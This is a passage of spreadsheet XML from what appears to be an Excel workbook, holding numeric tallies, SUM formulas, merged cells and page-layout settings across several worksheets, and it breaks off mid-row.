        <f aca="true" t="shared" si="2" ref="K9:K15">SUM(L9:S9)</f>
        <v>0</v>
      </c>
      <c r="L9" s="13"/>
      <c r="M9" s="13"/>
      <c r="N9" s="13"/>
      <c r="O9" s="13"/>
      <c r="P9" s="13"/>
      <c r="Q9" s="13"/>
      <c r="R9" s="13"/>
      <c r="S9" s="13"/>
      <c r="T9" s="16"/>
    </row>
    <row r="10" spans="1:20" ht="17.25" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="71">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C10" s="13">
        <v>3</v>
      </c>
      <c r="D10" s="13"/>
      <c r="E10" s="13"/>
      <c r="F10" s="13"/>
      <c r="G10" s="13"/>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="13"/>
      <c r="K10" s="71">
        <f t="shared" si="2"/>
        <v>300</v>
      </c>
      <c r="L10" s="13"/>
      <c r="M10" s="13"/>
      <c r="N10" s="13"/>
      <c r="O10" s="13">
        <v>300</v>
      </c>
      <c r="P10" s="13"/>
      <c r="Q10" s="13"/>
      <c r="R10" s="13"/>
      <c r="S10" s="13"/>
      <c r="T10" s="16"/>
    </row>
    <row r="11" spans="1:20" ht="17.25" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="71">
        <f t="shared" si="1"/>
        <v>19</v>
      </c>
      <c r="C11" s="13">
        <v>16</v>
      </c>
      <c r="D11" s="13">
        <v>3</v>
      </c>
      <c r="E11" s="13"/>
      <c r="F11" s="13"/>
      <c r="G11" s="13"/>
      <c r="H11" s="13"/>
      <c r="I11" s="13"/>
      <c r="J11" s="13"/>
      <c r="K11" s="71">
        <f t="shared" si="2"/>
        <v>101</v>
      </c>
      <c r="L11" s="13">
        <v>69</v>
      </c>
      <c r="M11" s="13">
        <v>32</v>
      </c>
      <c r="N11" s="13"/>
      <c r="O11" s="13"/>
      <c r="P11" s="13"/>
      <c r="Q11" s="13"/>
      <c r="R11" s="13"/>
      <c r="S11" s="13"/>
      <c r="T11" s="16"/>
    </row>
    <row r="12" spans="1:20" ht="17.25" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="71">
        <f t="shared" si="1"/>
        <v>10</v>
      </c>
      <c r="C12" s="13"/>
      <c r="D12" s="13">
        <v>10</v>
      </c>
      <c r="E12" s="13"/>
      <c r="F12" s="13"/>
      <c r="G12" s="13"/>
      <c r="H12" s="13"/>
      <c r="I12" s="13"/>
      <c r="J12" s="13"/>
      <c r="K12" s="71">
        <f t="shared" si="2"/>
        <v>362</v>
      </c>
      <c r="L12" s="13">
        <v>2</v>
      </c>
      <c r="M12" s="13">
        <v>160</v>
      </c>
      <c r="N12" s="13"/>
      <c r="O12" s="13"/>
      <c r="P12" s="13">
        <v>200</v>
      </c>
      <c r="Q12" s="13"/>
      <c r="R12" s="13"/>
      <c r="S12" s="13"/>
      <c r="T12" s="16"/>
    </row>
    <row r="13" spans="1:20" ht="17.25" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="71">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="C13" s="13">
        <v>0</v>
      </c>
      <c r="D13" s="13">
        <v>3</v>
      </c>
      <c r="E13" s="13">
        <v>1</v>
      </c>
      <c r="F13" s="13">
        <v>3</v>
      </c>
      <c r="G13" s="13">
        <v>0</v>
      </c>
      <c r="H13" s="13">
        <v>0</v>
      </c>
      <c r="I13" s="13">
        <v>0</v>
      </c>
      <c r="J13" s="13">
        <v>0</v>
      </c>
      <c r="K13" s="71">
        <f t="shared" si="2"/>
        <v>531</v>
      </c>
      <c r="L13" s="13">
        <v>0</v>
      </c>
      <c r="M13" s="13">
        <v>76</v>
      </c>
      <c r="N13" s="13">
        <v>68</v>
      </c>
      <c r="O13" s="13">
        <v>387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20" ht="17.25" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="71">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="C14" s="13"/>
      <c r="D14" s="13">
        <v>5</v>
      </c>
      <c r="E14" s="13"/>
      <c r="F14" s="13">
        <v>2</v>
      </c>
      <c r="G14" s="13"/>
      <c r="H14" s="13"/>
      <c r="I14" s="13"/>
      <c r="J14" s="13"/>
      <c r="K14" s="71">
        <f t="shared" si="2"/>
        <v>555</v>
      </c>
      <c r="L14" s="13"/>
      <c r="M14" s="13">
        <v>175</v>
      </c>
      <c r="N14" s="13"/>
      <c r="O14" s="13"/>
      <c r="P14" s="13">
        <v>380</v>
      </c>
      <c r="Q14" s="13"/>
      <c r="R14" s="13"/>
      <c r="S14" s="13"/>
      <c r="T14" s="16"/>
    </row>
    <row r="15" spans="1:20" ht="17.25" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="71">
        <f t="shared" si="1"/>
        <v>16</v>
      </c>
      <c r="C15" s="13"/>
      <c r="D15" s="13">
        <v>8</v>
      </c>
      <c r="E15" s="13">
        <v>5</v>
      </c>
      <c r="F15" s="13">
        <v>3</v>
      </c>
      <c r="G15" s="13"/>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="13"/>
      <c r="K15" s="71">
        <f t="shared" si="2"/>
        <v>1040</v>
      </c>
      <c r="L15" s="13"/>
      <c r="M15" s="13">
        <v>233</v>
      </c>
      <c r="N15" s="13">
        <v>349</v>
      </c>
      <c r="O15" s="13">
        <v>458</v>
      </c>
      <c r="P15" s="13"/>
      <c r="Q15" s="13"/>
      <c r="R15" s="13"/>
      <c r="S15" s="13"/>
      <c r="T15" s="16"/>
    </row>
    <row r="16" spans="1:20" ht="17.25" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="71">
        <f t="shared" si="1"/>
        <v>11</v>
      </c>
      <c r="C16" s="13">
        <v>1</v>
      </c>
      <c r="D16" s="13">
        <v>3</v>
      </c>
      <c r="E16" s="13">
        <v>4</v>
      </c>
      <c r="F16" s="13">
        <v>3</v>
      </c>
      <c r="G16" s="13">
        <v>0</v>
      </c>
      <c r="H16" s="13">
        <v>0</v>
      </c>
      <c r="I16" s="13">
        <v>0</v>
      </c>
      <c r="J16" s="13">
        <v>0</v>
      </c>
      <c r="K16" s="71">
        <v>797</v>
      </c>
      <c r="L16" s="13">
        <v>1</v>
      </c>
      <c r="M16" s="13">
        <v>51</v>
      </c>
      <c r="N16" s="13">
        <v>320</v>
      </c>
      <c r="O16" s="13">
        <v>425</v>
      </c>
      <c r="P16" s="13">
        <v>0</v>
      </c>
      <c r="Q16" s="13">
        <v>0</v>
      </c>
      <c r="R16" s="13">
        <v>0</v>
      </c>
      <c r="S16" s="13">
        <v>0</v>
      </c>
      <c r="T16" s="16"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="2">
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="Q2:S2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.7086614173228347" right="0.2362204724409449" top="0.984251968503937" bottom="0.5905511811023623" header="0.5118110236220472" footer="0.5118110236220472"/>
  <pageSetup horizontalDpi="300" verticalDpi="300" orientation="landscape" paperSize="9" scale="92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zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="6" topLeftCell="A7" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="20.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.50390625" style="1" customWidth="1"/>
    <col min="2" max="11" width="10.75390625" style="1" customWidth="1"/>
    <col min="12" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" ht="20.25" customHeight="1">
      <c r="A1" s="10" t="s">
        <v>419</v>
      </c>
      <c r="B1" s="10"/>
      <c r="C1" s="10"/>
      <c r="D1" s="10"/>
      <c r="E1" s="5"/>
      <c r="F1" s="5"/>
      <c r="G1" s="5"/>
      <c r="H1" s="5"/>
      <c r="I1" s="5"/>
      <c r="J1" s="5"/>
      <c r="K1" s="5"/>
    </row>
    <row r="2" spans="1:11" ht="20.25" customHeight="1">
      <c r="A2" s="10"/>
      <c r="B2" s="10"/>
      <c r="C2" s="10"/>
      <c r="D2" s="10"/>
      <c r="E2" s="5"/>
      <c r="F2" s="5"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="5"/>
      <c r="J2" s="181" t="s">
        <v>335</v>
      </c>
      <c r="K2" s="181"/>
    </row>
    <row r="3" spans="1:11" ht="20.25" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>179</v>
      </c>
      <c r="B3" s="66" t="s">
        <v>136</v>
      </c>
      <c r="C3" s="66"/>
      <c r="D3" s="66"/>
      <c r="E3" s="66"/>
      <c r="F3" s="66"/>
      <c r="G3" s="66"/>
      <c r="H3" s="179" t="s">
        <v>137</v>
      </c>
      <c r="I3" s="179"/>
      <c r="J3" s="179"/>
      <c r="K3" s="179"/>
    </row>
    <row r="4" spans="1:11" ht="20.25" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="66" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="66"/>
      <c r="D4" s="66" t="s">
        <v>138</v>
      </c>
      <c r="E4" s="66"/>
      <c r="F4" s="66" t="s">
        <v>139</v>
      </c>
      <c r="G4" s="66"/>
      <c r="H4" s="66" t="s">
        <v>140</v>
      </c>
      <c r="I4" s="66"/>
      <c r="J4" s="66" t="s">
        <v>141</v>
      </c>
      <c r="K4" s="66"/>
    </row>
    <row r="5" spans="1:11" ht="20.25" customHeight="1">
      <c r="A5" s="179"/>
      <c r="B5" s="62" t="s">
        <v>142</v>
      </c>
      <c r="C5" s="62" t="s">
        <v>143</v>
      </c>
      <c r="D5" s="62" t="s">
        <v>142</v>
      </c>
      <c r="E5" s="62" t="s">
        <v>143</v>
      </c>
      <c r="F5" s="62" t="s">
        <v>142</v>
      </c>
      <c r="G5" s="62" t="s">
        <v>143</v>
      </c>
      <c r="H5" s="62" t="s">
        <v>142</v>
      </c>
      <c r="I5" s="62" t="s">
        <v>143</v>
      </c>
      <c r="J5" s="62" t="s">
        <v>142</v>
      </c>
      <c r="K5" s="62" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="6" spans="1:11" ht="16.5" customHeight="1">
      <c r="A6" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="65">
        <f aca="true" t="shared" si="0" ref="B6:K6">SUM(B7:B17)</f>
        <v>121</v>
      </c>
      <c r="C6" s="65">
        <f t="shared" si="0"/>
        <v>9075</v>
      </c>
      <c r="D6" s="65">
        <f t="shared" si="0"/>
        <v>45</v>
      </c>
      <c r="E6" s="65">
        <f t="shared" si="0"/>
        <v>1503</v>
      </c>
      <c r="F6" s="65">
        <f t="shared" si="0"/>
        <v>76</v>
      </c>
      <c r="G6" s="65">
        <f t="shared" si="0"/>
        <v>7572</v>
      </c>
      <c r="H6" s="65">
        <f t="shared" si="0"/>
        <v>97</v>
      </c>
      <c r="I6" s="65">
        <f t="shared" si="0"/>
        <v>5778</v>
      </c>
      <c r="J6" s="65">
        <f t="shared" si="0"/>
        <v>24</v>
      </c>
      <c r="K6" s="65">
        <f t="shared" si="0"/>
        <v>3297</v>
      </c>
    </row>
    <row r="7" spans="1:11" ht="16.5" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B7" s="73">
        <f>SUM(D7,F7)</f>
        <v>14</v>
      </c>
      <c r="C7" s="76">
        <f>SUM(E7,G7)</f>
        <v>1995</v>
      </c>
      <c r="D7" s="13"/>
      <c r="E7" s="13"/>
      <c r="F7" s="13">
        <v>14</v>
      </c>
      <c r="G7" s="13">
        <v>1995</v>
      </c>
      <c r="H7" s="13"/>
      <c r="I7" s="13"/>
      <c r="J7" s="13">
        <v>14</v>
      </c>
      <c r="K7" s="13">
        <v>1995</v>
      </c>
    </row>
    <row r="8" spans="1:11" ht="16.5" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B8" s="73">
        <f aca="true" t="shared" si="1" ref="B8:B17">SUM(D8,F8)</f>
        <v>16</v>
      </c>
      <c r="C8" s="76">
        <f aca="true" t="shared" si="2" ref="C8:C17">SUM(E8,G8)</f>
        <v>1137</v>
      </c>
      <c r="D8" s="13"/>
      <c r="E8" s="13"/>
      <c r="F8" s="13">
        <v>16</v>
      </c>
      <c r="G8" s="13">
        <v>1137</v>
      </c>
      <c r="H8" s="13">
        <v>16</v>
      </c>
      <c r="I8" s="13">
        <v>1137</v>
      </c>
      <c r="J8" s="13"/>
      <c r="K8" s="13"/>
    </row>
    <row r="9" spans="1:11" ht="16.5" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="73">
        <f t="shared" si="1"/>
        <v>18</v>
      </c>
      <c r="C9" s="76">
        <f t="shared" si="2"/>
        <v>2257</v>
      </c>
      <c r="D9" s="13">
        <v>0</v>
      </c>
      <c r="E9" s="13">
        <v>0</v>
      </c>
      <c r="F9" s="13">
        <v>18</v>
      </c>
      <c r="G9" s="13">
        <v>2257</v>
      </c>
      <c r="H9" s="13">
        <v>9</v>
      </c>
      <c r="I9" s="13">
        <v>1055</v>
      </c>
      <c r="J9" s="13">
        <v>9</v>
      </c>
      <c r="K9" s="13">
        <v>1202</v>
      </c>
    </row>
    <row r="10" spans="1:11" ht="16.5" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="73">
        <f>SUM(D10,F10)</f>
        <v>0</v>
      </c>
      <c r="C10" s="76">
        <f>SUM(E10,G10)</f>
        <v>0</v>
      </c>
      <c r="D10" s="13"/>
      <c r="E10" s="13"/>
      <c r="F10" s="13"/>
      <c r="G10" s="13"/>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="13"/>
      <c r="K10" s="13"/>
    </row>
    <row r="11" spans="1:11" ht="16.5" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="73">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="C11" s="76">
        <f t="shared" si="2"/>
        <v>300</v>
      </c>
      <c r="D11" s="13"/>
      <c r="E11" s="13"/>
      <c r="F11" s="13">
        <v>3</v>
      </c>
      <c r="G11" s="13">
        <v>300</v>
      </c>
      <c r="H11" s="13">
        <v>2</v>
      </c>
      <c r="I11" s="13">
        <v>200</v>
      </c>
      <c r="J11" s="13">
        <v>1</v>
      </c>
      <c r="K11" s="13">
        <v>100</v>
      </c>
    </row>
    <row r="12" spans="1:11" ht="16.5" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="73">
        <f t="shared" si="1"/>
        <v>19</v>
      </c>
      <c r="C12" s="76">
        <f t="shared" si="2"/>
        <v>101</v>
      </c>
      <c r="D12" s="13">
        <v>19</v>
      </c>
      <c r="E12" s="13">
        <v>101</v>
      </c>
      <c r="F12" s="13"/>
      <c r="G12" s="13"/>
      <c r="H12" s="13">
        <v>19</v>
      </c>
      <c r="I12" s="13">
        <v>101</v>
      </c>
      <c r="J12" s="13"/>
      <c r="K12" s="13"/>
    </row>
    <row r="13" spans="1:11" ht="16.5" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="73">
        <f t="shared" si="1"/>
        <v>10</v>
      </c>
      <c r="C13" s="76">
        <f t="shared" si="2"/>
        <v>362</v>
      </c>
      <c r="D13" s="13">
        <v>10</v>
      </c>
      <c r="E13" s="13">
        <v>362</v>
      </c>
      <c r="F13" s="13"/>
      <c r="G13" s="13"/>
      <c r="H13" s="13">
        <v>10</v>
      </c>
      <c r="I13" s="13">
        <v>362</v>
      </c>
      <c r="J13" s="13"/>
      <c r="K13" s="13"/>
    </row>
    <row r="14" spans="1:11" ht="16.5" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="73">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="C14" s="76">
        <f t="shared" si="2"/>
        <v>531</v>
      </c>
      <c r="D14" s="13">
        <v>0</v>
      </c>
      <c r="E14" s="13">
        <v>0</v>
      </c>
      <c r="F14" s="13">
        <v>7</v>
      </c>
      <c r="G14" s="13">
        <v>531</v>
      </c>
      <c r="H14" s="13">
        <v>7</v>
      </c>
      <c r="I14" s="13">
        <v>531</v>
      </c>
      <c r="J14" s="13">
        <v>0</v>
      </c>
      <c r="K14" s="13">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:11" ht="16.5" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="73">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="C15" s="76">
        <f t="shared" si="2"/>
        <v>555</v>
      </c>
      <c r="D15" s="13"/>
      <c r="E15" s="13"/>
      <c r="F15" s="13">
        <v>7</v>
      </c>
      <c r="G15" s="13">
        <v>555</v>
      </c>
      <c r="H15" s="13">
        <v>7</v>
      </c>
      <c r="I15" s="13">
        <v>555</v>
      </c>
      <c r="J15" s="13"/>
      <c r="K15" s="13"/>
    </row>
    <row r="16" spans="1:11" ht="16.5" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="73">
        <f t="shared" si="1"/>
        <v>16</v>
      </c>
      <c r="C16" s="76">
        <f t="shared" si="2"/>
        <v>1040</v>
      </c>
      <c r="D16" s="13">
        <v>16</v>
      </c>
      <c r="E16" s="13">
        <v>1040</v>
      </c>
      <c r="F16" s="13"/>
      <c r="G16" s="13"/>
      <c r="H16" s="13">
        <v>16</v>
      </c>
      <c r="I16" s="13">
        <v>1040</v>
      </c>
      <c r="J16" s="13"/>
      <c r="K16" s="13"/>
    </row>
    <row r="17" spans="1:11" ht="16.5" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="73">
        <f t="shared" si="1"/>
        <v>11</v>
      </c>
      <c r="C17" s="76">
        <f t="shared" si="2"/>
        <v>797</v>
      </c>
      <c r="D17" s="13">
        <v>0</v>
      </c>
      <c r="E17" s="13">
        <v>0</v>
      </c>
      <c r="F17" s="13">
        <v>11</v>
      </c>
      <c r="G17" s="13">
        <v>797</v>
      </c>
      <c r="H17" s="13">
        <v>11</v>
      </c>
      <c r="I17" s="13">
        <v>797</v>
      </c>
      <c r="J17" s="13"/>
      <c r="K17" s="13"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="3">
    <mergeCell ref="H3:K3"/>
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="J2:K2"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.7480314960629921" top="0.7874015748031497" bottom="0.5511811023622047" header="0.5118110236220472" footer="0.5118110236220472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R16"/>
  <sheetViews>
    <sheetView zoomScaleSheetLayoutView="100" zoomScalePageLayoutView="0" workbookViewId="0" topLeftCell="A1">
      <pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="V25" sqref="V25"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="21.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="6.00390625" style="1" customWidth="1"/>
    <col min="2" max="3" width="5.00390625" style="1" bestFit="1" customWidth="1"/>
    <col min="4" max="5" width="7.25390625" style="1" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="8.125" style="1" customWidth="1"/>
    <col min="7" max="7" width="8.50390625" style="1" customWidth="1"/>
    <col min="8" max="8" width="8.375" style="1" customWidth="1"/>
    <col min="9" max="9" width="7.50390625" style="1" customWidth="1"/>
    <col min="10" max="10" width="9.00390625" style="1" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="5.875" style="1" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="7.625" style="1" bestFit="1" customWidth="1"/>
    <col min="13" max="13" width="6.75390625" style="1" customWidth="1"/>
    <col min="14" max="14" width="8.50390625" style="1" customWidth="1"/>
    <col min="15" max="16" width="9.00390625" style="1" bestFit="1" customWidth="1"/>
    <col min="17" max="17" width="8.50390625" style="1" bestFit="1" customWidth="1"/>
    <col min="18" max="16384" width="9.00390625" style="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:17" ht="21.75" customHeight="1">
      <c r="A1" s="10" t="s">
        <v>420</v>
      </c>
      <c r="B1" s="10"/>
      <c r="C1" s="10"/>
      <c r="D1" s="10"/>
      <c r="E1" s="10"/>
      <c r="F1" s="10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1.75" customHeight="1">
      <c r="A2" s="10"/>
      <c r="B2" s="10"/>
      <c r="C2" s="10"/>
      <c r="D2" s="10"/>
      <c r="E2" s="10"/>
      <c r="F2" s="10"/>
      <c r="G2" s="5"/>
      <c r="H2" s="5"/>
      <c r="I2" s="5"/>
      <c r="J2" s="5"/>
      <c r="K2" s="5"/>
      <c r="L2" s="5"/>
      <c r="M2" s="5"/>
      <c r="N2" s="5"/>
      <c r="O2" s="5"/>
      <c r="P2" s="5" t="s">
        <v>336</v>
      </c>
      <c r="Q2" s="5"/>
    </row>
    <row r="3" spans="1:17" ht="21.75" customHeight="1">
      <c r="A3" s="179" t="s">
        <v>178</v>
      </c>
      <c r="B3" s="66" t="s">
        <v>144</v>
      </c>
      <c r="C3" s="66"/>
      <c r="D3" s="66"/>
      <c r="E3" s="66"/>
      <c r="F3" s="66"/>
      <c r="G3" s="66"/>
      <c r="H3" s="66"/>
      <c r="I3" s="66"/>
      <c r="J3" s="66" t="s">
        <v>145</v>
      </c>
      <c r="K3" s="66"/>
      <c r="L3" s="66"/>
      <c r="M3" s="66"/>
      <c r="N3" s="66"/>
      <c r="O3" s="66"/>
      <c r="P3" s="66"/>
      <c r="Q3" s="66"/>
    </row>
    <row r="4" spans="1:17" ht="21.75" customHeight="1">
      <c r="A4" s="179"/>
      <c r="B4" s="62" t="s">
        <v>0</v>
      </c>
      <c r="C4" s="62" t="s">
        <v>23</v>
      </c>
      <c r="D4" s="62" t="s">
        <v>125</v>
      </c>
      <c r="E4" s="62" t="s">
        <v>7</v>
      </c>
      <c r="F4" s="62" t="s">
        <v>146</v>
      </c>
      <c r="G4" s="62" t="s">
        <v>116</v>
      </c>
      <c r="H4" s="62" t="s">
        <v>117</v>
      </c>
      <c r="I4" s="62" t="s">
        <v>147</v>
      </c>
      <c r="J4" s="62" t="s">
        <v>0</v>
      </c>
      <c r="K4" s="62" t="s">
        <v>23</v>
      </c>
      <c r="L4" s="62" t="s">
        <v>125</v>
      </c>
      <c r="M4" s="62" t="s">
        <v>273</v>
      </c>
      <c r="N4" s="62" t="s">
        <v>146</v>
      </c>
      <c r="O4" s="62" t="s">
        <v>116</v>
      </c>
      <c r="P4" s="62" t="s">
        <v>117</v>
      </c>
      <c r="Q4" s="62" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="5" spans="1:18" ht="15.75" customHeight="1">
      <c r="A5" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="65">
        <f aca="true" t="shared" si="0" ref="B5:Q5">SUM(B6:B16)</f>
        <v>0</v>
      </c>
      <c r="C5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="F5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="J5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="K5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="M5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="N5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="O5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="P5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="Q5" s="65">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="R5" s="17"/>
    </row>
    <row r="6" spans="1:18" ht="15.75" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="71">
        <f>SUM(C6:I6)</f>
        <v>0</v>
      </c>
      <c r="C6" s="13"/>
      <c r="D6" s="13"/>
      <c r="E6" s="13"/>
      <c r="F6" s="13"/>
      <c r="G6" s="13"/>
      <c r="H6" s="13"/>
      <c r="I6" s="13"/>
      <c r="J6" s="71">
        <f>SUM(K6:Q6)</f>
        <v>0</v>
      </c>
      <c r="K6" s="13"/>
      <c r="L6" s="13"/>
      <c r="M6" s="13"/>
      <c r="N6" s="13"/>
      <c r="O6" s="13"/>
      <c r="P6" s="13"/>
      <c r="Q6" s="13"/>
      <c r="R6" s="16"/>
    </row>
    <row r="7" spans="1:18" ht="15.75" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="71">
        <f aca="true" t="shared" si="1" ref="B7:B16">SUM(C7:I7)</f>
        <v>0</v>
      </c>
      <c r="C7" s="13"/>
      <c r="D7" s="13"/>
      <c r="E7" s="13"/>
      <c r="F7" s="13"/>
      <c r="G7" s="13"/>
      <c r="H7" s="13"/>
      <c r="I7" s="13"/>
      <c r="J7" s="71">
        <f aca="true" t="shared" si="2" ref="J7:J16">SUM(K7:Q7)</f>
        <v>0</v>
      </c>
      <c r="K7" s="13"/>
      <c r="L7" s="13"/>
      <c r="M7" s="13"/>
      <c r="N7" s="13"/>
      <c r="O7" s="13"/>
      <c r="P7" s="13"/>
      <c r="Q7" s="13"/>
      <c r="R7" s="16"/>
    </row>
    <row r="8" spans="1:18" ht="15.75" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C8" s="13"/>
      <c r="D8" s="13"/>
      <c r="E8" s="13"/>
      <c r="F8" s="13"/>
      <c r="G8" s="13"/>
      <c r="H8" s="13"/>
      <c r="I8" s="13"/>
      <c r="J8" s="71">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K8" s="13"/>
      <c r="L8" s="13"/>
      <c r="M8" s="13"/>
      <c r="N8" s="13"/>
      <c r="O8" s="13"/>
      <c r="P8" s="13"/>
      <c r="Q8" s="13"/>
      <c r="R8" s="16"/>
    </row>
    <row r="9" spans="1:18" ht="15.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C9" s="13"/>
      <c r="D9" s="13"/>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="13"/>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="71">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K9" s="13"/>
      <c r="L9" s="13"/>
      <c r="M9" s="13"/>
      <c r="N9" s="13"/>
      <c r="O9" s="13"/>
      <c r="P9" s="13"/>
      <c r="Q9" s="13"/>
      <c r="R9" s="16"/>
    </row>
    <row r="10" spans="1:18" ht="15.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C10" s="13"/>
      <c r="D10" s="13"/>
      <c r="E10" s="13"/>
      <c r="F10" s="13"/>
      <c r="G10" s="13"/>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="71">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K10" s="13"/>
      <c r="L10" s="13"/>
      <c r="M10" s="13"/>
      <c r="N10" s="13"/>
      <c r="O10" s="13"/>
      <c r="P10" s="13"/>
      <c r="Q10" s="13"/>
      <c r="R10" s="16"/>
    </row>
    <row r="11" spans="1:18" ht="15.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="71">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C11" s="13"/>
      <c r="D11" s="13"/>
      <c r="E11" s="13"/>
      <c r="F11" s="13"/>
      <c r="G11" s="13"/>
      <c r="H11" s="13"/>
      <c r="I11" s="13"/>
      <c r="J11" s="71">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="K11" s="13"/>
      <c r="L11" s="13"/>
      <c r="M11" s="13"/>
      <c r="N11" s="13"/>
      <c r="O11" s="13"/>
      <c r="P11" s="13"/>
      <c r="Q11" s="13"/>
      <c r="R11" s="16"/>
    </row>
    <row r="12" spans="1:18" ht="15.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="71">
